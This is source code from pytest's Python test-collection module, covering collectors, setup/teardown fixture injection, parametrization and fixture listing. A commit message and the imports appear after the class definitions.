_ALLOW_MARKERS = True
@property
def obj(self):
"""Underlying Python object."""
obj = getattr(self, "_obj", None)
if obj is None:
self._obj = obj = self._getobj()
# XXX evil hack
# used to avoid Instance collector marker duplication
if self._ALLOW_MARKERS:
self.own_markers.extend(get_unpacked_marks(self.obj))
return obj
@obj.setter
def obj(self, value):
self._obj = value
def _getobj(self):
"""Gets the underlying Python object. May be overwritten by subclasses."""
return getattr(self.parent.obj, self.name)
def getmodpath(self, stopatmodule=True, includemodule=False):
""" return python path relative to the containing module. """
chain = self.listchain()
chain.reverse()
parts = []
for node in chain:
if isinstance(node, Instance):
continue
name = node.name
if isinstance(node, Module):
name = os.path.splitext(name)[0]
if stopatmodule:
if includemodule:
parts.append(name)
break
parts.append(name)
parts.reverse()
s = ".".join(parts)
return s.replace(".[", "[")
def reportinfo(self) -> Tuple[str, int, str]:
# XXX caching?
obj = self.obj
compat_co_firstlineno = getattr(obj, "compat_co_firstlineno", None)
if isinstance(compat_co_firstlineno, int):
# nose compatibility
fspath = sys.modules[obj.__module__].__file__
if fspath.endswith(".pyc"):
fspath = fspath[:-1]
lineno = compat_co_firstlineno
else:
fspath, lineno = getfslineno(obj)
modpath = self.getmodpath()
assert isinstance(lineno, int)
return fspath, lineno, modpath
class PyCollector(PyobjMixin, nodes.Collector):
def funcnamefilter(self, name):
return self._matches_prefix_or_glob_option("python_functions", name)
def isnosetest(self, obj):
""" Look for the __test__ attribute, which is applied by the
@nose.tools.istest decorator
"""
# We explicitly check for "is True" here to not mistakenly treat
# classes with a custom __getattr__ returning something truthy (like a
# function) as test classes.
return safe_getattr(obj, "__test__", False) is True
def classnamefilter(self, name):
return self._matches_prefix_or_glob_option("python_classes", name)
def istestfunction(self, obj, name):
if self.funcnamefilter(name) or self.isnosetest(obj):
if isinstance(obj, staticmethod):
# static methods need to be unwrapped
obj = safe_getattr(obj, "__func__", False)
return (
safe_getattr(obj, "__call__", False)
and fixtures.getfixturemarker(obj) is None
)
else:
return False
def istestclass(self, obj, name):
return self.classnamefilter(name) or self.isnosetest(obj)
def _matches_prefix_or_glob_option(self, option_name, name):
"""
checks if the given name matches the prefix or glob-pattern defined
in ini configuration.
"""
for option in self.config.getini(option_name):
if name.startswith(option):
return True
# check that name looks like a glob-string before calling fnmatch
# because this is called for every name in each collected module,
# and fnmatch is somewhat expensive to call
elif ("*" in option or "?" in option or "[" in option) and fnmatch.fnmatch(
name, option
):
return True
return False
def collect(self):
if not getattr(self.obj, "__test__", True):
return []
# NB. we avoid random getattrs and peek in the __dict__ instead
# (XXX originally introduced from a PyPy need, still true?)
dicts = [getattr(self.obj, "__dict__", {})]
for basecls in inspect.getmro(self.obj.__class__):
dicts.append(basecls.__dict__)
seen = {}
values = []
for dic in dicts:
for name, obj in list(dic.items()):
if name in seen:
continue
seen[name] = True
res = self._makeitem(name, obj)
if res is None:
continue
if not isinstance(res, list):
res = [res]
values.extend(res)
values.sort(key=lambda item: item.reportinfo()[:2])
return values
def _makeitem(self, name, obj):
# assert self.ihook.fspath == self.fspath, self
return self.ihook.pytest_pycollect_makeitem(collector=self, name=name, obj=obj)
def _genfunctions(self, name, funcobj):
module = self.getparent(Module).obj
clscol = self.getparent(Class)
cls = clscol and clscol.obj or None
fm = self.session._fixturemanager
definition = FunctionDefinition(name=name, parent=self, callobj=funcobj)
fixtureinfo = fm.getfixtureinfo(definition, funcobj, cls)
metafunc = Metafunc(
definition, fixtureinfo, self.config, cls=cls, module=module
)
methods = []
if hasattr(module, "pytest_generate_tests"):
methods.append(module.pytest_generate_tests)
if hasattr(cls, "pytest_generate_tests"):
methods.append(cls().pytest_generate_tests)
self.ihook.pytest_generate_tests.call_extra(methods, dict(metafunc=metafunc))
if not metafunc._calls:
yield Function(name, parent=self, fixtureinfo=fixtureinfo)
else:
# add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
fixtures.add_funcarg_pseudo_fixture_def(self, metafunc, fm)
# add_funcarg_pseudo_fixture_def may have shadowed some fixtures
# with direct parametrization, so make sure we update what the
# function really needs.
fixtureinfo.prune_dependency_tree()
for callspec in metafunc._calls:
subname = "{}[{}]".format(name, callspec.id)
yield Function(
name=subname,
parent=self,
callspec=callspec,
callobj=funcobj,
fixtureinfo=fixtureinfo,
keywords={callspec.id: True},
originalname=name,
)
class Module(nodes.File, PyCollector):
""" Collector for test classes and functions. """
def _getobj(self):
return self._importtestmodule()
def collect(self):
self._inject_setup_module_fixture()
self._inject_setup_function_fixture()
self.session._fixturemanager.parsefactories(self)
return super().collect()
def _inject_setup_module_fixture(self):
"""Injects a hidden autouse, module scoped fixture into the collected module object
that invokes setUpModule/tearDownModule if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_module = _get_first_non_fixture_func(
self.obj, ("setUpModule", "setup_module")
)
teardown_module = _get_first_non_fixture_func(
self.obj, ("tearDownModule", "teardown_module")
)
if setup_module is None and teardown_module is None:
return
@fixtures.fixture(autouse=True, scope="module")
def xunit_setup_module_fixture(request):
if setup_module is not None:
_call_with_optional_argument(setup_module, request.module)
yield
if teardown_module is not None:
_call_with_optional_argument(teardown_module, request.module)
self.obj.__pytest_setup_module = xunit_setup_module_fixture
def _inject_setup_function_fixture(self):
"""Injects a hidden autouse, function scoped fixture into the collected module object
that invokes setup_function/teardown_function if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_function = _get_first_non_fixture_func(self.obj, ("setup_function",))
teardown_function = _get_first_non_fixture_func(
self.obj, ("teardown_function",)
)
if setup_function is None and teardown_function is None:
return
@fixtures.fixture(autouse=True, scope="function")
def xunit_setup_function_fixture(request):
if request.instance is not None:
# in this case we are bound to an instance, so we need to let
# setup_method handle this
yield
return
if setup_function is not None:
_call_with_optional_argument(setup_function, request.function)
yield
if teardown_function is not None:
_call_with_optional_argument(teardown_function, request.function)
self.obj.__pytest_setup_function = xunit_setup_function_fixture
def _importtestmodule(self):
# we assume we are only called once per module
importmode = self.config.getoption("--import-mode")
try:
mod = self.fspath.pyimport(ensuresyspath=importmode)
except SyntaxError:
raise self.CollectError(
_pytest._code.ExceptionInfo.from_current().getrepr(style="short")
)
except self.fspath.ImportMismatchError:
e = sys.exc_info()[1]
raise self.CollectError(
"import file mismatch:\n"
"imported module %r has this __file__ attribute:\n"
" %s\n"
"which is not the same as the test file we want to collect:\n"
" %s\n"
"HINT: remove __pycache__ / .pyc files and/or use a "
"unique basename for your test file modules" % e.args
)
except ImportError:
from _pytest._code.code import ExceptionInfo
exc_info = ExceptionInfo.from_current()
if self.config.getoption("verbose") < 2:
exc_info.traceback = exc_info.traceback.filter(filter_traceback)
exc_repr = (
exc_info.getrepr(style="short")
if exc_info.traceback
else exc_info.exconly()
)
formatted_tb = str(exc_repr)
raise self.CollectError(
"ImportError while importing test module '{fspath}'.\n"
"Hint: make sure your test modules/packages have valid Python names.\n"
"Traceback:\n"
"{traceback}".format(fspath=self.fspath, traceback=formatted_tb)
)
except _pytest.runner.Skipped as e:
if e.allow_module_level:
raise
raise self.CollectError(
"Using pytest.skip outside of a test is not allowed. "
"To decorate a test function, use the @pytest.mark.skip "
"or @pytest.mark.skipif decorators instead, and to skip a "
"module use `pytestmark = pytest.mark.{skip,skipif}."
)
self.config.pluginmanager.consider_module(mod)
return mod
class Package(Module):
def __init__(self, fspath, parent=None, config=None, session=None, nodeid=None):
session = parent.session
nodes.FSCollector.__init__(
self, fspath, parent=parent, config=config, session=session, nodeid=nodeid
)
self.name = fspath.dirname
self.trace = session.trace
self._norecursepatterns = session._norecursepatterns
self.fspath = fspath
def setup(self):
# not using fixtures to call setup_module here because autouse fixtures
# from packages are not called automatically (#4085)
setup_module = _get_first_non_fixture_func(
self.obj, ("setUpModule", "setup_module")
)
if setup_module is not None:
_call_with_optional_argument(setup_module, self.obj)
teardown_module = _get_first_non_fixture_func(
self.obj, ("tearDownModule", "teardown_module")
)
if teardown_module is not None:
func = partial(_call_with_optional_argument, teardown_module, self.obj)
self.addfinalizer(func)
def _recurse(self, dirpath):
if dirpath.basename == "__pycache__":
return False
ihook = self.gethookproxy(dirpath.dirpath())
if ihook.pytest_ignore_collect(path=dirpath, config=self.config):
return
for pat in self._norecursepatterns:
if dirpath.check(fnmatch=pat):
return False
ihook = self.gethookproxy(dirpath)
ihook.pytest_collect_directory(path=dirpath, parent=self)
return True
def gethookproxy(self, fspath):
# check if we have the common case of running
# hooks with all conftest.py filesall conftest.py
pm = self.config.pluginmanager
my_conftestmodules = pm._getconftestmodules(fspath)
remove_mods = pm._conftest_plugins.difference(my_conftestmodules)
if remove_mods:
# one or more conftests are not in use at this fspath
proxy = FSHookProxy(fspath, pm, remove_mods)
else:
# all plugins are active for this fspath
proxy = self.config.hook
return proxy
def _collectfile(self, path, handle_dupes=True):
assert (
path.isfile()
), "{!r} is not a file (isdir={!r}, exists={!r}, islink={!r})".format(
path, path.isdir(), path.exists(), path.islink()
)
ihook = self.gethookproxy(path)
if not self.isinitpath(path):
if ihook.pytest_ignore_collect(path=path, config=self.config):
return ()
if handle_dupes:
keepduplicates = self.config.getoption("keepduplicates")
if not keepduplicates:
duplicate_paths = self.config.pluginmanager._duplicatepaths
if path in duplicate_paths:
return ()
else:
duplicate_paths.add(path)
if self.fspath == path: # __init__.py
return [self]
return ihook.pytest_collect_file(path=path, parent=self)
def isinitpath(self, path):
return path in self.session._initialpaths
def collect(self):
this_path = self.fspath.dirpath()
init_module = this_path.join("__init__.py")
if init_module.check(file=1) and path_matches_patterns(
init_module, self.config.getini("python_files")
):
yield Module(init_module, self)
pkg_prefixes = set()
for path in this_path.visit(rec=self._recurse, bf=True, sort=True):
# We will visit our own __init__.py file, in which case we skip it.
is_file = path.isfile()
if is_file:
if path.basename == "__init__.py" and path.dirpath() == this_path:
continue
parts_ = parts(path.strpath)
if any(
pkg_prefix in parts_ and pkg_prefix.join("__init__.py") != path
for pkg_prefix in pkg_prefixes
):
continue
if is_file:
yield from self._collectfile(path)
elif not path.isdir():
# Broken symlink or invalid/missing file.
continue
elif path.join("__init__.py").check(file=1):
pkg_prefixes.add(path)
def _call_with_optional_argument(func, arg):
"""Call the given function with the given argument if func accepts one argument, otherwise
calls func without arguments"""
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count:
func(arg)
else:
func()
def _get_first_non_fixture_func(obj, names):
"""Return the attribute from the given object to be used as a setup/teardown
xunit-style function, but only if not marked as a fixture to
avoid calling it twice.
"""
for name in names:
meth = getattr(obj, name, None)
if meth is not None and fixtures.getfixturemarker(meth) is None:
return meth
class Class(PyCollector):
""" Collector for test methods. """
def collect(self):
if not safe_getattr(self.obj, "__test__", True):
return []
if hasinit(self.obj):
self.warn(
PytestCollectionWarning(
"cannot collect test class %r because it has a "
"__init__ constructor (from: %s)"
% (self.obj.__name__, self.parent.nodeid)
)
)
return []
elif hasnew(self.obj):
self.warn(
PytestCollectionWarning(
"cannot collect test class %r because it has a "
"__new__ constructor (from: %s)"
% (self.obj.__name__, self.parent.nodeid)
)
)
return []
self._inject_setup_class_fixture()
self._inject_setup_method_fixture()
return [Instance(name="()", parent=self)]
def _inject_setup_class_fixture(self):
"""Injects a hidden autouse, class scoped fixture into the collected class object
that invokes setup_class/teardown_class if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_class = _get_first_non_fixture_func(self.obj, ("setup_class",))
teardown_class = getattr(self.obj, "teardown_class", None)
if setup_class is None and teardown_class is None:
return
@fixtures.fixture(autouse=True, scope="class")
def xunit_setup_class_fixture(cls):
if setup_class is not None:
func = getimfunc(setup_class)
_call_with_optional_argument(func, self.obj)
yield
if teardown_class is not None:
func = getimfunc(teardown_class)
_call_with_optional_argument(func, self.obj)
self.obj.__pytest_setup_class = xunit_setup_class_fixture
def _inject_setup_method_fixture(self):
"""Injects a hidden autouse, function scoped fixture into the collected class object
that invokes setup_method/teardown_method if either or both are available.
Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
other fixtures (#517).
"""
setup_method = _get_first_non_fixture_func(self.obj, ("setup_method",))
teardown_method = getattr(self.obj, "teardown_method", None)
if setup_method is None and teardown_method is None:
return
@fixtures.fixture(autouse=True, scope="function")
def xunit_setup_method_fixture(self, request):
method = request.function
if setup_method is not None:
func = getattr(self, "setup_method")
_call_with_optional_argument(func, method)
yield
if teardown_method is not None:
func = getattr(self, "teardown_method")
_call_with_optional_argument(func, method)
self.obj.__pytest_setup_method = xunit_setup_method_fixture
class Instance(PyCollector):
_ALLOW_MARKERS = False # hack, destroy later
# instances share the object with their parents in a way
# that duplicates markers instances if not taken out
# can be removed at node structure reorganization time
def _getobj(self):
return self.parent.obj()
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super().collect()
def newinstance(self):
self.obj = self._getobj()
return self.obj
class FunctionMixin(PyobjMixin):
""" mixin for the code common to Function and Generator.
"""
def setup(self):
""" perform setup for this test function. """
if isinstance(self.parent, Instance):
self.parent.newinstance()
self.obj = self._getobj()
def _prunetraceback(self, excinfo):
if hasattr(self, "_obj") and not self.config.getoption("fulltrace", False):
code = _pytest._code.Code(get_real_func(self.obj))
path, firstlineno = code.path, code.firstlineno
traceback = excinfo.traceback
ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
if ntraceback == traceback:
ntraceback = ntraceback.cut(path=path)
if ntraceback == traceback:
ntraceback = ntraceback.filter(filter_traceback)
if not ntraceback:
ntraceback = traceback
excinfo.traceback = ntraceback.filter()
# issue364: mark all but first and last frames to
# only show a single-line message for each frame
if self.config.getoption("tbstyle", "auto") == "auto":
if len(excinfo.traceback) > 2:
for entry in excinfo.traceback[1:-1]:
entry.set_repr_style("short")
def repr_failure(self, excinfo, outerr=None):
assert outerr is None, "XXX outerr usage is deprecated"
style = self.config.getoption("tbstyle", "auto")
if style == "auto":
style = "long"
return self._repr_failure_py(excinfo, style=style)
def hasinit(obj):
init = getattr(obj, "__init__", None)
if init:
return init != object.__init__
def hasnew(obj):
new = getattr(obj, "__new__", None)
if new:
return new != object.__new__
class CallSpec2:
def __init__(self, metafunc):
self.metafunc = metafunc
self.funcargs = {}
self._idlist = []
self.params = {}
self._globalid = NOTSET
self._globalparam = NOTSET
self._arg2scopenum = {} # used for sorting parametrized resources
self.marks = []
self.indices = {}
def copy(self):
cs = CallSpec2(self.metafunc)
cs.funcargs.update(self.funcargs)
cs.params.update(self.params)
cs.marks.extend(self.marks)
cs.indices.update(self.indices)
cs._arg2scopenum.update(self._arg2scopenum)
cs._idlist = list(self._idlist)
cs._globalid = self._globalid
cs._globalparam = self._globalparam
return cs
def _checkargnotcontained(self, arg):
if arg in self.params or arg in self.funcargs:
raise ValueError("duplicate {!r}".format(arg))
def getparam(self, name):
try:
return self.params[name]
except KeyError:
if self._globalparam is NOTSET:
raise ValueError(name)
return self._globalparam
@property
def id(self):
return "-".join(map(str, filter(None, self._idlist)))
def setmulti2(self, valtypes, argnames, valset, id, marks, scopenum, param_index):
for arg, val in zip(argnames, valset):
self._checkargnotcontained(arg)
valtype_for_arg = valtypes[arg]
getattr(self, valtype_for_arg)[arg] = val
self.indices[arg] = param_index
self._arg2scopenum[arg] = scopenum
self._idlist.append(id)
self.marks.extend(normalize_mark_list(marks))
class Metafunc:
"""
Metafunc objects are passed to the :func:`pytest_generate_tests <_pytest.hookspec.pytest_generate_tests>` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
"""
def __init__(self, definition, fixtureinfo, config, cls=None, module=None):
assert (
isinstance(definition, FunctionDefinition)
or type(definition).__name__ == "DefinitionMock"
)
self.definition = definition
#: access to the :class:`_pytest.config.Config` object for the test session
self.config = config
#: the module object where the test function is defined in.
self.module = module
#: underlying python test function
self.function = definition.obj
#: set of fixture names required by the test function
self.fixturenames = fixtureinfo.names_closure
#: class object where the test function is defined in or ``None``.
self.cls = cls
self._calls = []
self._ids = set()
self._arg2fixturedefs = fixtureinfo.name2fixturedefs
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
warnings.warn(FUNCARGNAMES, stacklevel=2)
return self.fixturenames
def parametrize(self, argnames, argvalues, indirect=False, ids=None, scope=None):
""" Add new invocations to the underlying test function using the list
of argvalues for the given argnames. Parametrization is performed
during the collection phase. If you need to setup expensive resources
see about setting indirect to do it rather at test setup time.
:arg argnames: a comma-separated string denoting one or more argument
names, or a list/tuple of argument strings.
:arg argvalues: The list of argvalues determines how often a
test is invoked with different argument values. If only one
argname was specified argvalues is a list of values. If N
argnames were specified, argvalues must be a list of N-tuples,
where each tuple-element specifies a value for its respective
argname.
:arg indirect: The list of argnames or boolean. A list of arguments'
names (subset of argnames). If True the list contains all names from
the argnames. Each argvalue corresponding to an argname in this list will
be passed as request.param to its respective argname fixture
function so that it can perform more expensive setups during the
setup phase of a test rather than at collection time.
:arg ids: list of string ids, or a callable.
If strings, each is corresponding to the argvalues so that they are
part of the test id. If None is given as id of specific test, the
automatically generated id for that argument will be used.
If callable, it should take one argument (a single argvalue) and return
a string or return None. If None, the automatically generated id for that
argument will be used.
If no ids are provided they will be generated automatically from
the argvalues.
:arg scope: if specified it denotes the scope of the parameters.
The scope is used for grouping tests by parameter instances.
It will also override any fixture-function defined scope, allowing
to set a dynamic scope using test context or configuration.
"""
from _pytest.fixtures import scope2index
from _pytest.mark import ParameterSet
argnames, parameters = ParameterSet._for_parametrize(
argnames,
argvalues,
self.function,
self.config,
function_definition=self.definition,
)
del argvalues
if "request" in argnames:
fail(
"'request' is a reserved name and cannot be used in @pytest.mark.parametrize",
pytrace=False,
)
if scope is None:
scope = _find_parametrized_scope(argnames, self._arg2fixturedefs, indirect)
self._validate_if_using_arg_names(argnames, indirect)
arg_values_types = self._resolve_arg_value_types(argnames, indirect)
ids = self._resolve_arg_ids(argnames, ids, parameters, item=self.definition)
scopenum = scope2index(
scope, descr="parametrize() call in {}".format(self.function.__name__)
)
# create the new calls: if we are parametrize() multiple times (by applying the decorator
# more than once) then we accumulate those calls generating the cartesian product
# of all calls
newcalls = []
for callspec in self._calls or [CallSpec2(self)]:
for param_index, (param_id, param_set) in enumerate(zip(ids, parameters)):
newcallspec = callspec.copy()
newcallspec.setmulti2(
arg_values_types,
argnames,
param_set.values,
param_id,
param_set.marks,
scopenum,
param_index,
)
newcalls.append(newcallspec)
self._calls = newcalls
def _resolve_arg_ids(self, argnames, ids, parameters, item):
"""Resolves the actual ids for the given argnames, based on the ``ids`` parameter given
to ``parametrize``.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param ids: the ids parameter of the parametrized call (see docs).
:param List[ParameterSet] parameters: the list of parameter values, same size as ``argnames``.
:param Item item: the item that generated this parametrized call.
:rtype: List[str]
:return: the list of ids for each argname given
"""
from _pytest._io.saferepr import saferepr
idfn = None
if callable(ids):
idfn = ids
ids = None
if ids:
func_name = self.function.__name__
if len(ids) != len(parameters):
msg = "In {}: {} parameter sets specified, with different number of ids: {}"
fail(msg.format(func_name, len(parameters), len(ids)), pytrace=False)
for id_value in ids:
if id_value is not None and not isinstance(id_value, str):
msg = "In {}: ids must be list of strings, found: {} (type: {!r})"
fail(
msg.format(func_name, saferepr(id_value), type(id_value)),
pytrace=False,
)
ids = idmaker(argnames, parameters, idfn, ids, self.config, item=item)
return ids
def _resolve_arg_value_types(self, argnames, indirect):
"""Resolves if each parametrized argument must be considered a parameter to a fixture or a "funcarg"
to the function, based on the ``indirect`` parameter of the parametrized() call.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param indirect: same ``indirect`` parameter of ``parametrize()``.
:rtype: Dict[str, str]
A dict mapping each arg name to either:
* "params" if the argname should be the parameter of a fixture of the same name.
* "funcargs" if the argname should be a parameter to the parametrized test function.
"""
if isinstance(indirect, bool):
valtypes = dict.fromkeys(argnames, "params" if indirect else "funcargs")
elif isinstance(indirect, Sequence):
valtypes = dict.fromkeys(argnames, "funcargs")
for arg in indirect:
if arg not in argnames:
fail(
"In {}: indirect fixture '{}' doesn't exist".format(
self.function.__name__, arg
),
pytrace=False,
)
valtypes[arg] = "params"
else:
fail(
"In {func}: expected Sequence or boolean for indirect, got {type}".format(
type=type(indirect).__name__, func=self.function.__name__
),
pytrace=False,
)
return valtypes
def _validate_if_using_arg_names(self, argnames, indirect):
"""
Check if all argnames are being used, by default values, or directly/indirectly.
:param List[str] argnames: list of argument names passed to ``parametrize()``.
:param indirect: same ``indirect`` parameter of ``parametrize()``.
:raise ValueError: if validation fails.
"""
default_arg_names = set(get_default_arg_names(self.function))
func_name = self.function.__name__
for arg in argnames:
if arg not in self.fixturenames:
if arg in default_arg_names:
fail(
"In {}: function already takes an argument '{}' with a default value".format(
func_name, arg
),
pytrace=False,
)
else:
if isinstance(indirect, (tuple, list)):
name = "fixture" if arg in indirect else "argument"
else:
name = "fixture" if indirect else "argument"
fail(
"In {}: function uses no {} '{}'".format(func_name, name, arg),
pytrace=False,
)
def _find_parametrized_scope(argnames, arg2fixturedefs, indirect):
"""Find the most appropriate scope for a parametrized call based on its arguments.
When there's at least one direct argument, always use "function" scope.
When a test function is parametrized and all its arguments are indirect
(e.g. fixtures), return the most narrow scope based on the fixtures used.
Related to issue #1832, based on code posted by @Kingdread.
"""
from _pytest.fixtures import scopes
if isinstance(indirect, (list, tuple)):
all_arguments_are_fixtures = len(indirect) == len(argnames)
else:
all_arguments_are_fixtures = bool(indirect)
if all_arguments_are_fixtures:
fixturedefs = arg2fixturedefs or {}
used_scopes = [
fixturedef[0].scope
for name, fixturedef in fixturedefs.items()
if name in argnames
]
if used_scopes:
# Takes the most narrow scope from used fixtures
for scope in reversed(scopes):
if scope in used_scopes:
return scope
return "function"
def _ascii_escaped_by_config(val, config):
if config is None:
escape_option = False
else:
escape_option = config.getini(
"disable_test_id_escaping_and_forfeit_all_rights_to_community_support"
)
return val if escape_option else ascii_escaped(val)
def _idval(val, argname, idx, idfn, item, config):
if idfn:
try:
generated_id = idfn(val)
if generated_id is not None:
val = generated_id
except Exception as e:
# See issue https://github.com/pytest-dev/pytest/issues/2169
msg = "{}: error raised while trying to determine id of parameter '{}' at position {}\n"
msg = msg.format(item.nodeid, argname, idx)
raise ValueError(msg) from e
elif config:
hook_id = config.hook.pytest_make_parametrize_id(
config=config, val=val, argname=argname
)
if hook_id:
return hook_id
if isinstance(val, STRING_TYPES):
return _ascii_escaped_by_config(val, config)
elif val is None or isinstance(val, (float, int, bool)):
return str(val)
elif isinstance(val, REGEX_TYPE):
return ascii_escaped(val.pattern)
elif isinstance(val, enum.Enum):
return str(val)
elif hasattr(val, "__name__") and isinstance(val.__name__, str):
# name of a class, function, module, etc.
return val.__name__
return str(argname) + str(idx)
def _idvalset(idx, parameterset, argnames, idfn, ids, item, config):
if parameterset.id is not None:
return parameterset.id
if ids is None or (idx >= len(ids) or ids[idx] is None):
this_id = [
_idval(val, argname, idx, idfn, item=item, config=config)
for val, argname in zip(parameterset.values, argnames)
]
return "-".join(this_id)
else:
return _ascii_escaped_by_config(ids[idx], config)
def idmaker(argnames, parametersets, idfn=None, ids=None, config=None, item=None):
ids = [
_idvalset(valindex, parameterset, argnames, idfn, ids, config=config, item=item)
for valindex, parameterset in enumerate(parametersets)
]
if len(set(ids)) != len(ids):
# The ids are not unique
duplicates = [testid for testid in ids if ids.count(testid) > 1]
counters = Counter()
for index, testid in enumerate(ids):
if testid in duplicates:
ids[index] = testid + str(counters[testid])
counters[testid] += 1
return ids
def show_fixtures_per_test(config):
from _pytest.main import wrap_session
return wrap_session(config, _show_fixtures_per_test)
def _show_fixtures_per_test(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
def get_best_relpath(func):
loc = getlocation(func, curdir)
return curdir.bestrelpath(loc)
def write_fixture(fixture_def):
argname = fixture_def.argname
if verbose <= 0 and argname.startswith("_"):
return
if verbose > 0:
bestrel = get_best_relpath(fixture_def.func)
funcargspec = "{} -- {}".format(argname, bestrel)
else:
funcargspec = argname
tw.line(funcargspec, green=True)
fixture_doc = fixture_def.func.__doc__
if fixture_doc:
write_docstring(tw, fixture_doc)
else:
tw.line(" no docstring available", red=True)
def write_item(item):
try:
info = item._fixtureinfo
except AttributeError:
# doctests items have no _fixtureinfo attribute
return
if not info.name2fixturedefs:
# this test item does not use any fixtures
return
tw.line()
tw.sep("-", "fixtures used by {}".format(item.name))
tw.sep("-", "({})".format(get_best_relpath(item.function)))
# dict key not used in loop but needed for sorting
for _, fixturedefs in sorted(info.name2fixturedefs.items()):
assert fixturedefs is not None
if not fixturedefs:
continue
# last item is expected to be the one used by the test item
write_fixture(fixturedefs[-1])
for session_item in session.items:
write_item(session_item)
def showfixtures(config):
from _pytest.main import wrap_session
return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
fm = session._fixturemanager
available = []
seen = set()
for argname, fixturedefs in fm._arg2fixturedefs.items():
assert fixturedefs is not None
if not fixturedefs:
continue
for fixturedef in fixturedefs:
loc = getlocation(fixturedef.func, curdir)
if (fixturedef.argname, loc) in seen:
continue
seen.add((fixturedef.argname, loc))
available.append(
(
len(fixturedef.baseid),
fixturedef.func.__module__,
curdir.bestrelpath(loc),
fixturedef.argname,
fixturedef,
)
)
available.sort()
currentmodule = None
for baseid, module, bestrel, argname, fixturedef in available:
if currentmodule != module:
if not module.startswith("_pytest."):
tw.line()
tw.sep("-", "fixtures defined from {}".format(module))
currentmodule = module
if verbose <= 0 and argname[0] == "_":
continue
tw.write(argname, green=True)
if fixturedef.scope != "function":
tw.write(" [%s scope]" % fixturedef.scope, cyan=True)
if verbose > 0:
tw.write(" -- %s" % bestrel, yellow=True)
tw.write("\n")
loc = getlocation(fixturedef.func, curdir)
doc = fixturedef.func.__doc__ or ""
if doc:
write_docstring(tw, doc)
else:
tw.line(" {}: no docstring available".format(loc), red=True)
tw.line()
def write_docstring(tw, doc, indent=" "):
doc = doc.rstrip()
if "\n" in doc:
firstline, rest = doc.split("\n", 1)
else:
firstline, rest = doc, ""
if firstline.strip():
tw.line(indent + firstline.strip())
if rest:
for line in dedent(rest).split("\n"):
tw.write(indent + line + "\n")
class Function(FunctionMixin, nodes.Item):
""" a Function Item is responsible for setting up and executing a
Python test function.
"""
# disable since functions handle it themselves
_ALLOW_MARKERS = False
def __init__(
self,
name,
parent,
args=None,
config=None,
callspec=None,
callobj=NOTSET,
keywords=None,
session=None,
fixtureinfo=None,
originalname=None,
):
super().__init__(name, parent, config=config, session=session)
self._args = args
if callobj is not NOTSET:
self.obj = callobj
self.keywords.update(self.obj.__dict__)
self.own_markers.extend(get_unpacked_marks(self.obj))
if callspec:
self.callspec = callspec
# this is total hostile and a mess
# keywords are broken by design by now
# this will be redeemed later
for mark in callspec.marks:
# feel free to cry, this was broken for years before
# and keywords cant fix it per design
self.keywords[mark.name] = mark
self.own_markers.extend(normalize_mark_list(callspec.marks))
if keywords:
self.keywords.update(keywords)
# todo: this is a hell of a hack
# https://github.com/pytest-dev/pytest/issues/4569
self.keywords.update(
{
mark.name: True
for mark in self.iter_markers()
if mark.name not in self.keywords
}
)
if fixtureinfo is None:
fixtureinfo = self.session._fixturemanager.getfixtureinfo(
self, self.obj, self.cls, funcargs=True
)
self._fixtureinfo = fixtureinfo
self.fixturenames = fixtureinfo.names_closure
self._initrequest()
#: original function name, without any decorations (for example
#: parametrization adds a ``"[...]"`` suffix to function names).
#:
#: .. versionadded:: 3.0
self.originalname = originalname
def _initrequest(self):
self.funcargs = {}
self._request = fixtures.FixtureRequest(self)
@property
def function(self):
"underlying python 'function' object"
return getimfunc(self.obj)
def _getobj(self):
name = self.name
i = name.find("[") # parametrization
if i != -1:
name = name[:i]
return getattr(self.parent.obj, name)
@property
def _pyfuncitem(self):
"(compatonly) for code expecting pytest-2.2 style request objects"
return self
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
warnings.warn(FUNCARGNAMES, stacklevel=2)
return self.fixturenames
def runtest(self):
""" execute the underlying test function. """
self.ihook.pytest_pyfunc_call(pyfuncitem=self)
def setup(self):
super().setup()
fixtures.fillfixtures(self)
class FunctionDefinition(Function):
"""
internal hack until we get actual definition nodes instead of the
crappy metafunc hack
"""
def runtest(self):
raise RuntimeError("function definitions are not supposed to be used")
setup = runtest
Factor out _validate_parametrize_spelling
This makes it easier to read `pytest_generate_tests`.
""" Python test discovery, setup and run of test functions. """
import enum
import fnmatch
import inspect
import os
import sys
import warnings
from collections import Counter
from collections.abc import Sequence
from functools import partial
from textwrap import dedent
from typing import Tuple
import py
import _pytest
from _pytest import fixtures
from _pytest import nodes
from _pytest._code import filter_traceback
from _pytest.compat import ascii_escaped
from _pytest.compat import get_default_arg_names
from _pytest.compat import get_real_func
from _pytest.compat import getfslineno
from _pytest.compat import getimfunc
from _pytest.compat import getlocation
from _pytest.compat import is_generator
from _pytest.compat import iscoroutinefunction
from _pytest.compat import NOTSET
from _pytest.compat import REGEX_TYPE
from _pytest.compat import safe_getattr
from _pytest.compat import safe_isclass
from _pytest.compat import STRING_TYPES
from _pytest.config import hookimpl
from _pytest.deprecated import FUNCARGNAMES
from _pytest.main import FSHookProxy
from _pytest.mark import MARK_GEN
from _pytest.mark.structures import get_unpacked_marks
from _pytest.mark.structures import normalize_mark_list
from _pytest.outcomes import fail
from _pytest.outcomes import skip
from _pytest.pathlib import parts
from _pytest.warning_types import PytestCollectionWarning
from _pytest.warning_types import PytestUnhandledCoroutineWarning
